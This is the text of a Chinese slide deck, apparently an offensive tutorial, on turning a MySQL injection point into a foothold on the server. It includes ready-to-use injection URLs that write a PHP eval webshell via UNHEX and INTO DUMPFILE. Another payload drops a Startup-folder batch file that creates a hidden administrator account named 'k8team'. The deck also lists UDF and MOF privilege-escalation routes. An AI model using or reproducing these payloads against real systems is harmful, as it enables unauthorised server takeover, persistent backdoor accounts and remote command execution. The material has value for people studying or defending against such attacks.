K8飞刀--Mysql注入点远程种马(无物理路径非root权限).ppt

* Mysql注入点远程种马 K8拉登哥哥 K8飞刀--Mysql注入点远程种马 实现原理 将可执行文件用HEX()编码后，分段导出并UNHEX()解码所有HEX()编码后的文件分段，在导出的文件中重组为完整的文件。 应用场景 有注入点却无法爆出物理路径的情况下，满足导出文件条件，可以考虑用这种方法得到服务器权限。 Mysql导出文件条件 1 Root权限(其实并非root不可 ,具备insert权限即可) 2 可写目录(即使是system权限,用驱动限制也没法写) 如图: 使用sqlmap注入无论是写shell还是执行命令都需要提供物理路径,没路径怎么办? K8飞刀--Mysql注入点远程种马 k8bbs注入漏洞环境为例 注入点: 42/php/k8bbs/news.php?id=3 and 1=2 union select 1,user(),3,4,5 K8飞刀--Mysql注入点远程种马 导出webshell(大家都懂的) 42/php/k8bbs/news.php?id=3 and 1=2 union select 1,2,3,4,unhex(3C3F70687020406576616C28245F504F53545B27746F6D275D293B3F3E) into dumpfile C:/AAWServer/www/php/k82.php; K8飞刀--Mysql注入点远程种马 导出后的webshell内容 可以看出导出后的内容是这样的 一句话前面有1234,是webshell还好. 如果是导出二进制文件那将如何? 比如导出cmd.exe 文件肯定是废了 当然还有一种情况也会导致shell无法运行,字段中出现php结束代码等 怎么办? 所以我们要想办法改进,最好能保证导出原本的webshell内容 K8飞刀--Mysql注入点远程种马 导出后的webshell内容 网传改成0x00可解决 实际结果如下 改成null也是一样 webshell能保证正常运行了,但exe或bat等可执行文件就 K8飞刀--Mysql注入点远程种马 导出任意文件 按照开头说的原理 分段再合成,即可完美解决 改进一下payload 发现成功导出我们指定内容 到这里我们已经完美解决注入点导出任意文件 42/php/k8bbs/news.php?id=3 and 1=2 union select 0x3C3F,0x7068,0x7020,0x4065,unhex(76616C28245F504F53545B27746F6D275D293B3F3E) into dumpfile C:/AAWServer/www/php/k82.php; K8飞刀--Mysql注入点远程种马 导出bat文件到启动项 bat下载者或任意操作,有杀软的话是会报警的...这也是此法的缺陷之一 42/php/k8bbs/news.php?id=3 and 1=2 union select 0x6E,0x65,0x74,0x20,0x75736572206B387465616D204B387465616D353230202F6164640D0A6E6574206C6F63616C67726F75702061646D696E6973747261746F7273206B387465616D202F616464 into dumpfile C:/Documents and Settings/All Users/Start Menu/Programs/Startup/k8.bat; K8飞刀--Mysql注入点远程种马 Mysql注入点种马的几种方法 1 导出hta vbs bat exe等到启动项或开机会加载脚本的地方 此方法需要目标机器重启...若无法让管理员重启将无效 服务器上存在杀软的话,导出可执行文件估计直接拦截 2 计划任务(实战测试本地配的脚本丢到目标机完全无效) 3 UDF提权 (有条件执行create等函数才能执行命令) 有时候注入点长度限制也不定能把整个udf导过去 4 MOF提权(完美解决以上3种方法的缺陷,直接种马) MOF提权 1 网上的mof提权里面是通过JS来执行命令的 缺陷添加用户提权还不能在一个脚本里完成 研究了下也没能解决此问题...发现echo等也没输出结果到指定目录...执行命令没法回显